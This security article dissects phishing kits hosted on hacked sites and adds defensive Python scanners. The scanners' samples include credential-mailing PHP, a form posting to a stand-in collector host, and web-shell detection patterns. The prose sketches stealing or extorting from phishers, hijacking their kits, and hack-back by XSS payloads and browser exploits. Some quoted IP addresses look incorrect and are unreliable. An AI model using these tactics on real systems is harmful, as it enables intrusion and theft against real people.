Misleading titles can ruin your reading, and since the one above could mean more than it appears to, it is better to clear that up right now. This document will talk about how innocent, unprotected websites are used as anchors: they are harbours, they are docks for phishing activities. It will discuss and show how Phishing as a Service (FaaS) already exists, not just for the phishers but also for passers-by who intend to use or misuse the service. A lot of the time FaaS is offered unintentionally, without the phisher's knowledge, to visitors smarter than the audience the phisher had in mind.
This document is not a step-by-step guide on how to set up a phishing page. It is a practical autopsy of live phishing pages which were stumbled upon. It will demonstrate how, as a potential or past victim of a phishing request, you can help stop further damage, and it will point out the mistakes and trails left by phishers. If you are a phisher and are reading this document, you can rate yourself after checking whether you committed any of the blunders discussed here.
A lot of the time cyber criminals break into a large number of websites using just one common vulnerability. For example, a recent WordPress or Joomla plugin's SQL injection exploit, a recently discovered admin backdoor in another CMS, or a buffer overflow in a web service which applies to more than one version can prove to be a good earning phase for people with malicious cyber intent. By leveraging just one particular vulnerability these people can break into thousands of systems in one go! It's like a mad scientist discovering a flaw in human immunity and crafting a nasty virus to unleash over an entire continent using a UAV / drone.
Uses for compromised systems
In the cyber scene, a vulnerable, exploitable system can prove to be of more than one use, and it can be compromised in more than one way. The system could be:
1] Transmogrified into a bot, part of a large botnet.
2] Converted into a command and control server for other bots.
3] Misused as a drop point for confidential files extracted from other infected computers and corporate systems. These files could be documents, banking details, passwords, etc.
4] Turned into a host for serving phishing pages.
5] Used to crunch bitcoins.
6] Configured to gather the passwords of banking accounts, social networking websites, email accounts, etc. from the system itself.
The list of ways to misuse a compromised system is not endless, but it is quickly growing as malevolent people find newer uses for such systems. The screenshot of a phishing setup below clearly shows cc99.php (a variant or renamed form of the C99 PHP web shell script, which attackers often use to maintain access on a compromised server that supports PHP).
Quite recently I had been keeping an eye on a lot of phishing websites and pages which pop up all over the Internet. Out of the thousands of phishing pages which pop up daily, only a few get reported to PhishTank and other phish-tracking systems. These services are used by many browsers, ISPs and companies with assets to protect. PhishTank itself can be a really good place for cybercrooks, or anybody, to earn some extra money. It is quite simple.
For example, you visit and rip off a recently discovered phishing page which has been hosted on someone else's website, rather than on a stand-alone website made especially to phish. The reason is that phishing pages hosted on hacked websites are generally uploaded after hacking into the website, which means a weak password, a weak configuration file giving away a password or hash, or a directly exploitable vulnerability could get you in.
Most phishers are only interested in planting phishing pages on as many websites as they can, so that even if one of them gets shut down or deleted they can change the dynamic DNS or their domain to point to some other place. If they are using a direct link in the emails then they just craft one more with a new URL containing the same page content. Very few phishers go out of their way to patch the hacked website to disallow others from gaining access. But sometimes even breaking in is not required (as the screenshot below demonstrates).
A few lines further on you will come across some screenshots which were obtained without breaking into the server.
Crackers who attack and break into massive numbers of IP addresses / websites often run automated or batch scripts. These cover everything from resolving IPs, carrying out the SQL injections and dumping databases, to uploading the phishing page. The pages are often zipped before upload, and many times they forget to delete the original zip file after extracting it.
If you are lucky, the directory listing will be enabled and you can directly view and download the original zip file with the phishing website pages in it, along with the PHP source which contains the email addresses.
Fetching the bounty / Retrieving the data
So if you come across a phishing page then there are high chances that breaking into it would not require much effort. But what after breaking in? You don’t intend to plant one more page of a different bank right?
Every phishing page aims to retrieve user names, account numbers, and transaction and login passwords. Hence phishers either save the gathered data on a local or remote disk or email the data back to themselves:
1] Save the data to a local or remote location.
2] Email it to the cracker’s email address.
Saving on the local disk is too risky and requires the attacker to revisit the website again and again, leaving more traces and hence more traces to clean. Saving on a remote disk requires passing credentials. Email, on the other hand, is more convenient but equally risky: a network sniffer on the website's end, at the shared host's end or at any other sniffable location, along with the risk of that system getting hacked or taken down, also has to be taken into consideration by the would-be attacker.
Live monitoring / a Security Operations Center (if available for that website) will instantly give away the phisher's malicious intent and the state of the hacked website. Phishers generally do not encrypt the information before emailing it.
Another constraint for emailing is that the server must have a mail transfer agent such as sendmail or qmail active and running if it is a *nix system. On a compromised Windows system running PHP, a mailing agent has to be installed; hence phishers either push the details into a MySQL database or prefer websites running ASP, which makes emailing easier. Very few phishers use FTP to upload the information to a remote server.
Despite all this, phishers prefer the emailing method.
The screenshots shown below are taken from the source code of two separate phishing pages for NEDBANK online banking:
The pictures clearly show that the recipient addresses are stored on the compromised systems in plain-text.
A funny incident happened once where the host server didn’t have PHP enabled. On hitting “Login” after entering the credentials on the phishing page, instead of the PHP file getting processed, its source code got echoed out onto the screen – clearly displaying the email addresses to which the credentials were meant to be sent.
Breeds of Bounty Raiders / Types of phishers
Four kinds of attackers can take advantage of the above:
1] Fruit Sucker: Where another bad guy breaks into a hacked, vulnerable website with an existing phishing page and changes the address the details are emailed to, or keeps the original addresses too along with his own in Bcc. This is a very easy way for him to make extra money. All passwords and account numbers keyed in reach his inbox directly without tipping off the original phishers. If the phishers are rookies and lack automated money-transferring scripts, are too lazy to work 24/7 and are situated in a different time zone, then these advantages can help the fruit sucker withdraw large amounts (leaving a few behind) from the compromised accounts before they do.
2] CXOck Sucker / Spear Sucker: A second kind of attacker could be a good guy who breaks into the phishing websites and changes the email address to NEDBANK's CSO's or NEDBANK's CEO's email address. After this (or maybe before) he contacts the bank and asks for a small remuneration for his services.
Also reworded as :
An attack against the original crackers. For example, a good guy who breaks into the phishing websites and changes the email address to NEDBANK's CSO's or CEO's email address. After this he contacts the bank to make them aware of the security breach.
3] Haxtortionist: When an attacker patches the system, pulls down the phishing page and emails the attackers threatening that he will report abuse of those email addresses and inform NEDBANK. Now, you cannot easily report abuse to email servers hosted in Ukraine and Afghanistan, but reporting abuse to the ones hosted by Google, Yahoo and similarly large companies can easily be tackled in the USA. In this way the attacker extorts a small share of the money from the original crackers in return for unlatching the hacked website and keeping silent about the email addresses where the details are being transferred. Although the chances of getting paid through haxtortion are slim, it's a way.
4] Robin-HAT: Here the attacker, after collecting a lot of passwords, changes the recipient's email address for the purpose of redistributing wealth. He/she withdraws money from the accounts and donates a significant portion to charity. Such individuals cannot be called grey hats because they are criminals robbing from other criminals. They are Robin-HATs, those who steal from rich victims and their attackers and redistribute the wealth to the poor and needy.
Another version of this type of attack: the Robin-HATs uniformly redistribute the assets from the richer compromised accounts to the compromised accounts with lower funds, especially paying attention to accounts that have had low balances for a prolonged period of time.
A fifth term might be – a good guy robbing from a Robin-HAT – that could be called a Bat-HAT.
Ghosts in the Phishplex
One strange thing was noticed at the end of index.php from one of the phishing pages.
The content is shown below:
The content of a .htaccess or maybe a php.ini file was found in index.php.
The presence of the IPs may be the result of a clipboard action malfunction. On the other hand, it could be a deliberate ploy by a counter-attacker. Another logical reason could be that they intended to block visitors who know the page is a phishing trap. This would also deny access to the few individuals who are on their own blacklist. These could include known IP addresses originating from Antivirus Companies and other Anti malware organizations.
Another randomly stumbled-upon website was hosting the VISA phishing page. The directory listing shows visa.zip placed directly in the web root without any obscure naming.
On opening this file we found another innocent-looking JPEG file called visa.jpg. As seen in the screenshot, it's actually a compressed archive and not just a JPEG image file.
The PHP file is using fopen() and fwrite() to save the contents to a file rather than emailing it.
The phishing website with the visa.zip file took both actions; it saved the contents and then emailed them.
Another dual-action scenario was seen in a phishing setup for Halifax Online Banking. The screenshot below should now be self-explanatory, because the phishers aren't very creative when it comes to the PHP and Perl scripts that email the juice.
As a backup option another PHP file emails the juicy info and deletes the log file so that others cannot read it. On every POST it extracts the information, emails it and deletes the file.
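The trails described in the last few sections (a forgotten kit archive sitting beside its extracted directory, a PHP form handler that writes POSTed credentials to a local log with fopen()/fwrite(), a mailer that sends them to a hard-coded address and then unlink()s the log, and a renamed web shell such as cc99.php) can all be found by a web host with a simple static scan of the document root. The script below is an added example written for this document, not code from the article or from any phishing kit; the web root it scans, the file names and the PHP snippets in it are constructed stand-ins built in a temporary directory, and the indicator names are my own labels.

```python
"""Scan a web root for the residue a phishing kit typically leaves behind.

Added example (not from the original article). It looks for the trails the
article describes: a leftover archive beside the directory it was extracted
into, PHP that mails form data to a hard-coded recipient, PHP that appends
POSTed data to a local log file, a mail-then-unlink cleanup script, and a
c99-style web shell filename. All sample files are constructed here.
"""
import re
import tempfile
from pathlib import Path

ARCHIVE_SUFFIXES = {".zip", ".rar", ".tar", ".gz", ".7z"}

# Patterns for the two exfiltration styles discussed in the article.
MAIL_CALL = re.compile(r"\b(mail|mb_send_mail)\s*\(", re.I)
EMAIL_ADDR = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
FILE_WRITE = re.compile(r"\b(fopen|fwrite|file_put_contents)\s*\(", re.I)
POST_ACCESS = re.compile(r"\$_(POST|REQUEST)\b")
UNLINK_CALL = re.compile(r"\bunlink\s*\(", re.I)
# Filenames used by the c99 web shell and renamed copies such as cc99.php.
WEBSHELL_NAME = re.compile(r"^c+99.*\.php$", re.I)


def scan_php_source(src: str) -> list:
    """Return the indicator labels (constructed names) found in one PHP source."""
    found = []
    if MAIL_CALL.search(src) and EMAIL_ADDR.search(src):
        found.append("mails-to-hardcoded-address")
    if FILE_WRITE.search(src) and POST_ACCESS.search(src):
        found.append("logs-post-data-to-file")
    if UNLINK_CALL.search(src) and MAIL_CALL.search(src):
        found.append("mails-then-deletes-log")
    return found


def scan_webroot(root: str) -> list:
    """Walk the web root and return sorted (relative path, indicator) findings."""
    findings = []
    root_path = Path(root)
    for path in root_path.rglob("*"):
        if path.is_dir():
            continue
        rel = path.relative_to(root_path).as_posix()
        if path.suffix.lower() in ARCHIVE_SUFFIXES:
            # An archive next to a same-named directory is the forgotten kit zip.
            if (path.parent / path.stem).is_dir():
                findings.append((rel, "leftover-kit-archive"))
            else:
                findings.append((rel, "archive-in-webroot"))
        if WEBSHELL_NAME.match(path.name):
            findings.append((rel, "webshell-filename"))
        if path.suffix.lower() == ".php":
            try:
                src = path.read_text(errors="replace")
            except OSError:
                continue
            for indicator in scan_php_source(src):
                findings.append((rel, indicator))
    return sorted(findings)


def build_sample_webroot(root: str) -> None:
    """Write constructed sample files mimicking the article's observations."""
    r = Path(root)
    (r / "visa").mkdir(parents=True)
    (r / "visa.zip").write_bytes(b"PK\x03\x04 constructed placeholder archive")
    (r / "visa" / "login.php").write_text(
        '<?php $f = fopen("log.txt", "a"); fwrite($f, $_POST["user"]); fclose($f); ?>')
    (r / "visa" / "send.php").write_text(
        '<?php mail("drop-box@example.invalid", "visa", file_get_contents("log.txt"));'
        ' unlink("log.txt"); ?>')
    (r / "cc99.php").write_text("<?php /* constructed stand-in for a web shell */ ?>")
    (r / "index.php").write_text("<?php echo 'legitimate page'; ?>")


def demo_scan() -> list:
    """Build the constructed web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, indicator in demo_scan():
        print(f"{indicator:28s} {rel}")
```

Run it against a real document root with `scan_webroot("/var/www/html")`; the archive check is the cheapest win, because a kit zip left next to its extracted directory needs no source parsing at all, while the PHP patterns are deliberately loose and should be reviewed by hand rather than acted on automatically.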
Helmets for Phishers
Workarounds for Phishers to avoid their Phishing page being detected by potential victims:
Just like a malicious packet hitting an IDS, or a computer virus or a biological virus infecting an unaware host, nothing gets detected unless its signature is present in the blacklist. The same applies to phishing pages: unless a phishing page has been reported earlier as a scam page, it won't be detected by a browser which relies on blacklists. Regular, automated checks can help the phisher keep tabs on the anti-phishing services and get alerted when the real purpose of the page becomes openly known, i.e. the phisher can track when the page gets blacklisted.
Staying safe from Phishers
This applies to features in browsers like Opera, Internet Explorer, Chrome and Mozilla Firefox.
Opera relies on blacklists from Netcraft and calls the feature Fraud and Malware Protection.
Every URL you visit first goes to sitecheck2.opera.com (one of the noted IPs is 184.108.40.206).
Microsoft Internet Explorer calls its feature for detecting and reporting malicious websites "SmartScreen Filter".
It can be enabled as shown in the screenshot above, or go to Tools / Internet Options / <navigate to the "Security level for this zone" area> / click on Custom level... / Miscellaneous / Use SmartScreen Filter / Enabled.
Similar checks are done by Microsoft Internet Explorer, Chrome and Firefox.
Alternatively you can use OpenDNS as the DNS server in your Ethernet and wireless cards' IP configuration.
Although OpenDNS might not be updated as quickly (as observed in a few tests) and takes you to a search engine (possibly powered by Google) on every website which fails to resolve, it is quite good at maintaining uncorrupted, un-poisoned DNS records. It's reliable when you suspect your ISP of injecting iframes, redirecting you and tracking your visits.
OpenDNS can be set by filling in the DNS servers as 220.127.116.11 and 18.104.22.168 (one as primary and the other as alternative, or vice versa).
Such features greatly reduce the chances of a person falling prey to a phishing website once it has been reported. On average it takes no more than 8 hours of hosting a phishing page before somebody reports it. That is a very long gap, because in Asia (maybe in other continents too) banks are provided with phishing alerts by third parties who sign an SLA stating that they have to inform the bank within 5 minutes of a phishing page popping up on the Internet. That's right. This means that if right now you are surfing directly from a system with a public IP address, and you deliberately host a phishing page, or some cracker compromises your system, hosts a phishing page and sends out a phishing email, then if that third party is lucky enough to receive that email, their team needs to detect, check and report it within 5 minutes. They'll report the page to the banks and maybe even inform PhishTank, Netcraft, Haute Security, etc.
Searching for Phishers?
Phishers host banking and other phishing pages, then write socially engineered emails and send them to users across the globe. Most often they have a massive list of email addresses and names. They also regularly buy and sell such information, including full names, birthdates, email addresses, age, gender, phone numbers, etc. This type of information can also be used for identity theft.
What's important here is that during this filtering process the phishers try to leave out suspicious addresses which could belong to people in the Internet security domain. Most of the emails are sent to addresses which do not end with a corporate or company domain name, so expect only your Yahoo! spam folder, or those of other public email hosting services, to be filled with phishing emails.
If you are interested in starting your own research into phishing or building a company similar to PhishTank, you can begin by signing up a dummy email address on a lot of questionable websites, especially porn and warez websites. Just give out your email address freely and the URIs for recently hosted phishing pages and scam emails will start pouring in for your research and action.
Despite all of the efforts by phishers to avoid sending emails to antivirus/anti-phishing companies and other information security domains, a dummy email (similar to the type previously mentioned, whose sole intention is to infiltrate would-be phishers' lists) may be included on their massive email list. That's all it takes. Once he/she reports the page, the browsers become aware of the malicious nature of the page. And once that happens, the number of users affected by the scam goes down drastically.
The above was just the problem statement for a typical phisher. How do phishers overcome it? How do phishers avoid being exposed? What's the workaround for phishers so that the compromised websites hosting their phishing pages can reach out and steal your money?
For this we have to go back a few lines above, where we pointed out the browser settings for detecting phishing pages.
Before taking you to the page where they ask for your credentials, phishers can point you to a page which contains shellcode to disable anti-phishing checks and change your DNS to their custom DNS server, and then redirect the victim to the actual phishing page. There is a fair chance that anybody who reports would report the page to which the victim was redirected, and not the page which redirected the victim after executing the shellcode to disable phishing checks.
To prevent becoming a victim of this type of attack, a heuristic scan comparing the contents of pages with lists of well-known websites like PayPal, American Express Bank, CitiBank, etc. should be done. That way the browser can detect rogue pages by DNS and other matching checks and does not have to rely solely on blacklists.
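One way to sketch the heuristic, blacklist-free check the paragraph above asks for, as an added example that is not part of the article and not any browser's actual implementation: the page is scored on whether it names a brand while being served from a domain that brand does not own, whether its login form posts credentials to a foreign host, and whether it puts a password field on a plain-HTTP page. The brand-to-domain table, the `score_page` function and the three sample pages are constructed for this demonstration; a real browser check would use a curated brand list and a proper public-suffix lookup instead of the crude "last two labels" domain helper here.

```python
"""Heuristic phishing-page check against brand/domain expectations.

Added example (not from the article): a small blacklist-free heuristic of
the kind the article calls for. KNOWN_BRANDS is an assumed, constructed table
of brand names and the registrable domains that brand serves from; the three
sample pages are constructed HTML, and the hostnames in them are fictitious.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Assumed brand -> legitimate registrable domains (constructed for this example).
KNOWN_BRANDS = {
    "paypal": {"paypal.com"},
    "citibank": {"citi.com", "citibank.com"},
    "american express": {"americanexpress.com"},
}


class FormCollector(HTMLParser):
    """Collect form actions, presence of password inputs, and visible text."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

    def handle_data(self, data):
        self.text.append(data)


def registrable_domain(host: str) -> str:
    """Crude last-two-labels domain; a real check would use the public suffix list."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def score_page(page_url: str, html: str) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one fetched page."""
    p = FormCollector()
    p.feed(html)
    page_host = urlparse(page_url).hostname or ""
    page_domain = registrable_domain(page_host)
    text = " ".join(p.text).lower()
    reasons = []

    # 1. A brand is named, but the page is served from a domain it does not own.
    for brand, domains in KNOWN_BRANDS.items():
        if brand in text and page_domain not in domains:
            reasons.append(f"mentions {brand!r} but served from {page_domain}")

    # 2. A form posts credentials to a host other than the page's own.
    for action in p.actions:
        target = urlparse(urljoin(page_url, action)).hostname or page_host
        if registrable_domain(target) != page_domain:
            reasons.append(f"form posts to foreign host {target}")

    # 3. A password field on a page that is not served over HTTPS.
    if p.has_password and urlparse(page_url).scheme != "https":
        reasons.append("password field on plain-HTTP page")

    # Two independent signals are required to limit false positives on news
    # articles or blogs that merely mention a bank's name.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}


# Constructed sample pages (fictitious hosts).
PHISH_URL = "http://hacked-site.example/visa/index.php"
PHISH_HTML = ("<html><body><h1>PayPal Login</h1><form action='send.php' method='post'>"
              "<input type='text' name='user'><input type='password' name='pass'>"
              "</form></body></html>")
LEGIT_URL = "https://www.paypal.com/signin"
LEGIT_HTML = ("<html><body><h1>Log in to PayPal</h1><form action='/signin/submit' "
              "method='post'><input type='password' name='pw'></form></body></html>")
FOREIGN_URL = "https://compromised-host.example/citi/login.html"
FOREIGN_HTML = ("<html><body><h2>Welcome to CitiBank Online</h2>"
                "<form action='http://collector.example/grab.php' method='post'>"
                "<input type='password' name='pin'></form></body></html>")

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML),
                      (FOREIGN_URL, FOREIGN_HTML)):
        print(url, score_page(url, html))
```

The "two signals" threshold is the design choice worth noting: brand mention alone flags every review site and news story, while a foreign form target alone flags legitimate single-sign-on flows, so the heuristic only fires when the signals agree.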
Strengthen the current. Make the catch difficult / Defending against potential phishing attacks
How to make a phisher’s life difficult:
• In situations where the phisher relies on gathering credentials from a file where all data gets saved, it is easy to fill the log file with garbled text or XSS- and CSRF-capable code. Not always, but the phisher might view the logs in a browser or using some client-side software. A multi-vector attack covering all possible vulnerabilities and client software which might be used to view the logs can help the victim attack the attacker and possibly gain access to their command and control center too. It is definitely a long shot but worth the attempt.
• Banks can deliberately visit the phishing pages and key in custom usernames and passwords which won't work online to buy anything, but which are red-flagged as honey-comb credentials the moment the frustrated phisher keys them in. These are not real accounts; they are made for the phisher to use, so that when they are entered on the real banking website a form opens which sends browser exploits to the target, aiming to gain a shell on the phisherman's system. This would send back the IP address and other system details.
There is a high chance the attacker is behind Privoxy, Tor, etc. In such a scenario the specially crafted page will have to do a name resolution of the IP and, on detecting it as Tor or Privoxy, reply back that "browsing using Tor is not supported".
A desperate phisher might just switch over to his real IP and try to log on to the banking terminal, hence giving away more than just his identity and location.
The best bet is to redirect the attacker to a browser-pwning page silently after he keys in the (fake) honey-comb credentials.
While it is true that setting up phishing pages is a fairly easy process, doesn't require any huge investment and is one of the simplest cyber-crimes to pull off, it is still one of those crimes wherein the thief himself/herself might get mugged by passers-by and like-minded criminals.
It's like how a fake ATM, recording the magnetic strips and codes of customers, can itself get stolen at the end of the day by a smarter thief. The website storing the victims' credentials, the stash itself, could get robbed! Phishing is a double-edged sword, except that the pommel and hilt can be sharper than the blade.
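The honey-comb credential idea in the "Strengthen the current" section has a purely defensive half that needs no browser exploit at all: a bank that has seeded fake usernames into phishing forms only has to watch its own login log for those usernames, since nobody but a phisher (or whoever robbed the phisher's stash) can ever present them. The code below is an added example written for this document, not the article's or any bank's implementation; the log line format, the canary usernames and the source addresses are constructed, and the `first`/`last` timestamps assume the log is read in chronological order.

```python
"""Detect use of canary ("honey-comb") credentials in a login log.

Added example (not from the article): the defensive half of the
honey-credential idea. Every attempt with a seeded canary username is an
attacker by definition, so attempts are grouped by source address with their
timing for an analyst to act on. Log format, usernames and addresses are
constructed; the log is assumed to be in chronological order.
"""
import re
from collections import defaultdict

# Canary usernames seeded into phishing forms (constructed; never real accounts).
CANARY_USERS = {"hc-7731-qx", "hc-8820-lm"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+) login user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)$"
)

# Constructed auth-log sample: two real customers, two sources trying canaries,
# and one malformed line the parser must skip.
SAMPLE_LOG = """\
2024-05-01T08:00:01Z login user=alice src=203.0.113.10 result=ok
2024-05-01T08:04:17Z login user=hc-7731-qx src=198.51.100.23 result=fail
2024-05-01T08:04:52Z login user=hc-7731-qx src=198.51.100.23 result=fail
2024-05-01T09:30:00Z login user=bob src=203.0.113.11 result=ok
2024-05-01T11:15:44Z login user=hc-8820-lm src=198.51.100.23 result=fail
malformed line that the parser must skip
2024-05-02T02:10:09Z login user=hc-7731-qx src=192.0.2.77 result=fail
"""


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def canary_hits(log_text: str, canaries=CANARY_USERS) -> dict:
    """Group canary-credential attempts by source address.

    Returns {src: {"users": [...], "attempts": n, "first": ts, "last": ts}}.
    """
    by_src = defaultdict(lambda: {"users": set(), "attempts": 0,
                                  "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["user"].lower() not in canaries:
            continue
        entry = by_src[rec["src"]]
        entry["users"].add(rec["user"].lower())
        entry["attempts"] += 1
        entry["first"] = entry["first"] or rec["ts"]  # first seen wins
        entry["last"] = rec["ts"]                      # latest line wins
    return {src: {**e, "users": sorted(e["users"])} for src, e in by_src.items()}


def is_canary_login(username: str, canaries=CANARY_USERS) -> bool:
    """Inline check for the login handler: a canary login is always denied and alerted."""
    return username.strip().lower() in canaries


if __name__ == "__main__":
    for src, info in canary_hits(SAMPLE_LOG).items():
        print(f"{src}: {info['attempts']} attempt(s) with {info['users']} "
              f"between {info['first']} and {info['last']}")
```

In the login path `is_canary_login` should run before any real credential lookup, so that the canary never reaches the account database and the alert fires on the very first attempt; the log-based `canary_hits` then gives the analyst the source addresses and the spread of attempts to correlate with the phishing page the credentials were seeded into.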